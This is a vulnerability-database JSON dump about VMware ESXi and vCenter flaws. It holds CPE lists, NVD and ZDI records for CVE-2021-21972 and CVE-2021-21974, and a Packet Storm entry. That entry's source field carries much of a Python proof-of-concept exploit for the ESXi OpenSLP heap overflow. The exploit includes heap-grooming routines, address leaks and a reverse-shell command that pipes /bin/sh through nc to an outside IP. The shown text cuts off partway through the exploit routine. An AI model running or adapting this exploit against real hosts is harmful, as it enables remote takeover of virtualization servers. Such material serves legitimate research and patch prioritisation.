"cpe:2.3:o:vmware:esxi:6.7:670-201901403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810225:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201912101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201811001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201703002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810222:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004405:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810234:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201701001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0.0:b:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904228-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707103:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201710001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202006001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904202-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904222-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904210-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201806001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-202007001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201912001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201910001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904229:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810227:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-202010001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904229-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810231:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201912403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904212-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904224-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810224:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201903001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904205-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904207-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904218-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201704001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904227:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201912002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912405:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810233:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004408:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904206-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810228:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904208-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904219-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201808001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904215-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904218:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201911401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0.0:u1b:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810223:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-202005001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0.0:u1:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908218:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201912102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201912104:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904223-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004407:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904225-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-202011002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201905001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904222:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908104:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904220-ug:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:55:49", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T17:15:00", "type": "cve", "title": "CVE-2021-21972", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-09-07T22:07:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.7", "cpe:/a:vmware:vcenter_server:6.5", "cpe:/a:vmware:vcenter_server:7.0"], "id": "CVE-2021-21972", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21972", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:6.7:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3k:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3j:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1b:*:*:*:*:*:*"]}], "zdi": [{"lastseen": "2022-01-31T22:27:17", "description": "This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of VMware ESXi. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of SLP messages. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the SLP daemon.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-24T00:00:00", "type": "zdi", "title": "VMware ESXi SLP Heap-based Buffer Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21974"], "modified": "2021-02-24T00:00:00", "id": "ZDI-21-250", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-250/", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-06-03T16:19:10", "description": "", "cvss3": {}, "published": "2021-06-03T00:00:00", "type": "packetstorm", "title": "VMware ESXi OpenSLP Heap Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21974"], "modified": "2021-06-03T00:00:00", "id": "PACKETSTORM:162957", "href": "https://packetstormsecurity.com/files/162957/VMware-ESXi-OpenSLP-Heap-Overflow.html", "sourceData": "`#!/usr/bin/python3 \n###################################################################################################### \n# CVE-2021-21974 PoC Exploit \n# By: Johnny Yu (@staight_blast) \n# Tested against: \n# [1] VMware ESXi 6.7.0 build-14320388 ; VMware ESXi 6.7.0 Update 3 \n# [2] VMware ESXi 6.7.0 build-16316930 ; VMware ESXi 6.7.0 Update 3 \n###################################################################################################### \nimport sys \nimport time \nimport trace \nimport queue \nimport struct \nimport socket \nimport threading \n \nIP = sys.argv[1] \n#shell_cmd = b'echo \"pwned\" > /tmp/pwn' \nshell_cmd = b'mknod /tmp/backpipe p ; /bin/sh 0</tmp/backpipe | nc 192.168.0.194 80 1>/tmp/backpipe' \n \nDEBUG = False \nPRINT = True \nLOG_LEAK = False \n \nT = 0.3 #0.4 \nPORT = 427 \nCOMMAND = 'command' \nMARKER = b'\\xef\\xbe\\xad\\xde' \n \nLISTEN = 0x65 \nSTREAM_READ = 0x6c \nSTREAM_WRITE = 0x6f \nSTREAM_READ_FIRST = 0x6d \n \nLISTEN_FD = 0x8 \n \nleaked_data = b'\\x00\\x00\\x00\\x00' \nleaked_values = None \n \nclass SLP_Thread(threading.Thread): \ndef __init__(self, input_q): \nsuper(SLP_Thread, self).__init__() \nself.input_q = input_q \n \ndef run(self): \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nwhile True: \ntry: \n \ndata = self.input_q.get(True, 0.05) \nname = threading.current_thread().name.replace('Thread','SLP Client') \n \nif 'connect' == data[COMMAND]: \nif PRINT: \nprint('[' + name + '] connect') \ns.connect((IP, PORT)) \n \nelif 'service request' == data[COMMAND]: \narg1 = data['arg1'] \noutgoing = self.generate_srv_rqst(arg1) \nif PRINT: \nprint('[' + name + '] service request') \ns.send(outgoing) \nd = s.recv(1024) \nif PRINT: \nprint('[' + name + '] recv: ', d) \n \nelif 'directory agent advertisement' == data[COMMAND]: \narg1 = data['arg1'] \narg2 = data['arg2'] \noutgoing = self.generate_da_advert(arg1, arg2) \nif PRINT: \nprint('[' + name + '] directory agent advertisement') \ns.send(outgoing) \nd = s.recv(1024) \nif PRINT: \nprint('[' + name + '] recv: ', d) \n \nelif 'service registration' == data[COMMAND]: \narg1 = data['arg1'] \narg2 = data['arg2'] \narg3 = data['arg3'] \narg4 = data['arg4'] \noutgoing = self.generate_srv_reg(arg1, arg2, arg3, arg4) \nif PRINT: \nprint('[' + name + '] service registration') \ns.send(outgoing) \nd = s.recv(1024) \nif PRINT: \nprint('[' + name +'] recv: ', d) \n \nelif 'attribute request' == data[COMMAND]: \narg1 = data['arg1'] \narg2 = data['arg2'] \noutgoing = self.generate_attrib_rqst(arg1) \nif PRINT: \nprint('[' + name + '] attribute request') \ns.send(outgoing) \noutput = b'' \nfor i in range(0, arg2): \noutput += s.recv(1) \nif PRINT: \nprint('[' + name + '] recv: ', output) \n \nelif 'recv' == data[COMMAND]: \noutput = b'' \narg1 = data['arg1'] \narg2 = data['arg2'] \nfor i in range(0, arg2): \noutput += s.recv(1) \nif arg1: \nprint('[' + name + '] recv: ', output) \n \nelif 'leak data' == data[COMMAND]: \noutgoing = b'' \nincoming = b'' \narg1 = data['arg1'] \n \nif arg1 > 0: \n \nfor i in range(0, arg1): \noutgoing += s.recv(1) \n \n#print(outgoing.hex()) \n \nglobal leaked_data \nleaked_data = outgoing \n \nelse: \n \nwhile True: \nincoming = s.recv(1) \noutgoing += incoming \nif MARKER in outgoing: \nbreak \n \nglobal leaked_values \nleaked_values = [] \n \ntry: \nfor i in range(0, len(outgoing), 4): \nv = struct.unpack('<I', outgoing[i : i+4])[0] \nleaked_values.append(v) \nexcept: \npass \n \nelif 'close' == data[COMMAND]: \nif PRINT: \nprint('[' + name + '] close') \ns.close() \nbreak \n \nexcept queue.Empty: \ncontinue \n \ndef generate_slp_header(self, payload, functionid, xid, extoffset): \npacketlen = len(payload) + 16 \nif extoffset: \nextoffset += 16 \nheader = bytearray([2, functionid]) \nheader.extend(struct.pack('!IH', packetlen, 0)[1:]) \nheader.extend(struct.pack('!IHH', extoffset, xid, 2)[1:]) \nheader.extend(b'en') \nreturn header \n \ndef generate_srv_rqst(self, data): \nsrvtype = prlist = scopes = predicate = b'' \nspi = data \npayload = bytearray(struct.pack('!H', len(prlist)) + prlist) \npayload.extend(struct.pack('!H', len(srvtype)) + srvtype) \npayload.extend(struct.pack('!H', len(scopes)) + scopes) \npayload.extend(struct.pack('!H', len(predicate)) + predicate) \npayload.extend(struct.pack('!H', len(spi)) + spi) \nheader = self.generate_slp_header(payload, 1, 5, 0) \nreturn header + payload \n \ndef generate_da_advert(self, url, scopes): \nerror_code = 0 \nboot_time = int(time.time()) \nattributes = spi = auth_blocks = b'' \npayload = bytearray(struct.pack('!H', error_code) + struct.pack('!I', boot_time)) \npayload.extend(struct.pack('!H', len(url)) + url) \npayload.extend(struct.pack('!H', len(scopes)) + scopes) \npayload.extend(struct.pack('!H', len(attributes)) + attributes) \npayload.extend(struct.pack('!H', len(spi)) + spi) \npayload.extend(struct.pack('!H', len(auth_blocks)) + auth_blocks) \nheader = self.generate_slp_header(payload, 8, 0, 0) \nreturn header + payload \n \ndef generate_url_entry(self, url): \nlifetime = 2 * 60 #seconds \nauth_blocks = b'' \npayload = bytearray([0]) \npayload.extend(struct.pack('!H', lifetime)) \npayload.extend(struct.pack('!H', len(url)) + url) \npayload.extend(struct.pack('!B', len(auth_blocks)) + auth_blocks) \nreturn payload \n \ndef generate_srv_reg(self, url, srvtype, scopes, attributes): \nattrib_auth_blocks = b'' \nurl_entry = self.generate_url_entry(url) \npayload = bytearray(url_entry) \npayload.extend(struct.pack('!H', len(srvtype)) + srvtype) \npayload.extend(struct.pack('!H', len(scopes)) + scopes) \npayload.extend(struct.pack('!H', len(attributes)) + attributes) \npayload.extend(struct.pack('!B', len(attrib_auth_blocks)) + attrib_auth_blocks) \nheader = self.generate_slp_header(payload, 3, 20, 0) \nreturn header + payload \n \ndef generate_attrib_rqst(self, url): \nscopes = b'DEFAULT' \nprlist = tags = spi = b'' \npayload = bytearray(struct.pack('!H', len(prlist)) + prlist) \npayload.extend(struct.pack('!H', len(url)) + url) \npayload.extend(struct.pack('!H', len(scopes)) + scopes) \npayload.extend(struct.pack('!H', len(tags)) + tags) \npayload.extend(struct.pack('!H', len(spi)) + spi) \nheader = self.generate_slp_header(payload, 6, 12, 0) \nreturn header + payload \n \ndef close(): \ntime.sleep(T) \nreturn {'command' : 'close'} \n \ndef connect(): \ntime.sleep(T) \nreturn {'command' : 'connect'} \n \ndef service_request(arg1): \ntime.sleep(T) \nreturn {'command' : 'service request', 'arg1' : arg1} \n \ndef da_advert_request(arg1, arg2): \ntime.sleep(T) \nreturn {'command' : 'directory agent advertisement', 'arg1' : arg1, 'arg2' : arg2} \n \ndef service_registration(arg1, arg2): \ntime.sleep(T) \nreturn {'command' : 'service registration', 'arg1' : b'127.0.0.1', 'arg2' : arg1, 'arg3' : b'default', 'arg4' : arg2} \n \ndef attribute_request(arg1, arg2): \ntime.sleep(T) \nreturn {'command' : 'attribute request', 'arg1' : arg1, 'arg2' : arg2} \n \ndef leak_data(arg1 = -1): \ntime.sleep(T) \nreturn {'command' : 'leak data', 'arg1': arg1} \n \ndef overflow_and_extend(size, flag): \narg1 = b'A' * 24 \narg2 = b'B' * 13 + struct.pack('<H', size + flag) + b':/' + b'C' * 647 \nreturn da_advert_request(arg1, arg2) \n \ndef update_target_slpdsocket(fd, size, state): \npayload = b'\\xd0\\x00\\x00\\x00' \npayload += b'\\x00' * 8 + b'\\xbe\\xba\\xfe\\xca' \npayload += struct.pack('<I', fd) \npayload += b'\\x00' * 4 \npayload += struct.pack('<I', state) \npayload += b'\\x00' * 12 \npayload += b'\\x02\\x00\\x00\\x00' \npayload += b'\\x7f\\x00\\x00\\x01' \npayload += b'\\x00' * 8 \nfiller = b'A' * (size - 0x76) \nreturn service_request(filler + payload) \n \ndef partial_update_target_send_buffer(size, send_buffer_size, flag, data): \npayload = struct.pack('<I', send_buffer_size + flag) \npayload += b'\\x00' * 8 \npayload += struct.pack('<I', send_buffer_size - 0x20) \npayload += data #b'\\x00' * 2 \nfiller = b'A' * (size - 0x56) \nreturn service_request(filler + payload) \n \ndef update_target_send_buffer(size, send_buffer_size, flag, address, length): \npayload = struct.pack('<I', send_buffer_size + flag) \npayload += b'\\x00' * 8 \npayload += struct.pack('<I', send_buffer_size - 0x20) \npayload += struct.pack('<I', address) * 2 \npayload += struct.pack('<I', address + length) \npayload += b'\\x00' * 0x10 \nfiller = b'A' * (size - 0x66) \nreturn service_request(filler + payload) \n \ndef update_target_recv_buffer(size, address): \nsize += 0x1a \npayload = b'\\x40\\x00\\x00\\x00' \npayload += b'\\x00' * 8 \npayload += struct.pack('<I', size) \npayload += struct.pack('<I', address - 26) * 2 + struct.pack('<I', address - 26 + size) \nfiller = b'A' * 0xca \nreturn service_request(filler + payload) \n \ndef block(size): \nif size > 0x38: \nsize = size - 0x38 \nelse: \nsize = 1 \nreturn service_request(b'A' * size) \n \ndef breakpoint(): \ntime.sleep(T) \ninput('breakpoint') \n \ndef exploit(): \ncount = 60 \nrequests = [0] \nslpclients = [0] \n \nglobal leaked_data \nglobal leaked_values \n \nrequests.extend([queue.Queue() for i in range(1, count)]) \nslpclients.extend([SLP_Thread(input_q = requests[i]) for i in range(1, count)]) \n \nfor i in range(1, count): \nslpclients[i].start() \n \nrequests[1].put(connect()) \nrequests[1].put(da_advert_request(b'roflmao://pwning', b'BBB')) \n \nrequests[2].put(connect()) \nrequests[3].put(connect()) \nrequests[4].put(connect()) \nrequests[5].put(connect()) \n \nrequests[2].put(block(0x40)) \nrequests[3].put(block(0x40)) \nrequests[4].put(block(0x40)) \nrequests[5].put(block(0x40)) \n \nrequests[6].put(connect()) \nrequests[6].put(block(0x810)) \nrequests[7].put(connect()) \nrequests[8].put(connect()) \nrequests[6].put(close()) \nrequests[9].put(connect()) \nrequests[9].put(overflow_and_extend(0x140, 0x1)) \nfd = 0xc \nrequests[8].put(update_target_slpdsocket(fd, 0x140, STREAM_READ_FIRST)) \nrequests[7].put(service_registration(b'service:pwn', MARKER + b'B' * (0x3200 - 21 - 4))) \nrequests[8].put(update_target_slpdsocket(LISTEN_FD, 0x140, LISTEN)) \nrequests[10].put(connect()) \nrequests[10].put(block(0x70)) \n \nrequests[11].put(connect()) \nrequests[12].put(connect()) \nrequests[13].put(connect()) \nrequests[11].put(block(0x810)) \nrequests[14].put(connect()) \nrequests[14].put(block(0x160)) \nrequests[12].put(block(0x810)) \nrequests[14].put(close()) \nrequests[15].put(connect()) \nrequests[15].put(attribute_request(b'service:pwn', 0x20)) \n \nrequests[13].put(block(0x110)) \nrequests[16].put(connect()) \nrequests[17].put(connect()) \n \nrequests[12].put(close()) \nrequests[18].put(connect()) \nrequests[18].put(overflow_and_extend(0x120, 0x3)) \nrequests[17].put(partial_update_target_send_buffer(0x120, 0x3220, 0x1, b'\\x00\\x00')) \nrequests[19].put(connect()) \nrequests[19].put(block(0x178)) \n \nrequests[11].put(close()) \nrequests[20].put(connect()) \nrequests[20].put(overflow_and_extend(0x140, 0x1)) \nfd = 0x11 \nrequests[16].put(update_target_slpdsocket(fd, 0x140, STREAM_WRITE)) \nrequests[16].put(update_target_slpdsocket(LISTEN_FD, 0x140, LISTEN)) \nrequests[21].put(connect()) \nrequests[21].put(block(0x178)) \nrequests[15].put(leak_data()) \n \ntime.sleep(T + 1.0) \n \nheap_address = 0 \nlibc_base_address = 0 \n \nif leaked_values == None: \nprint(\"[-] Exploit Failed [-]\") \nreturn -1 \n \nleaked_values = leaked_values[::-1] \n \nif LOG_LEAK: \nfor i in leaked_values: \nprint(hex(i)) \n \nif leaked_values[0] == 0xdeadbeef: \nheap_address = leaked_values[6] - 0x3220 + 0x4 \n \nelif leaked_values[0] == 0xefeb3174: \nheap_offset = 0x2b1 if leaked_values[42] == 0x42424242 else 0x5d61 \nheap_address = leaked_values[14] + heap_offset \n \nlibc_leak_location = heap_address - 0x100 + 4 \n \nrequests[22].put(connect()) \nrequests[22].put(block(0x810)) \nrequests[23].put(connect()) \nrequests[23].put(block(0x100)) \nrequests[24].put(connect()) 